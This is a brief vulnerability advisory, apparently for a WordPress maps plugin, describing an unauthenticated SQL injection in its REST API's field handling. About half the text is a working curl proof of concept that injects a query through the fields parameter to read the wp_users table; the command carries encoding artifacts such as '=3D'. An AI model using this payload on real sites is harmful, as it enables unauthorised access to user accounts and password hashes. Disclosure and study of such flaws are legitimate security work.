The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue.
curl -k --silent "http://example.com/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=fields=3D*+from+wp_users+--+-"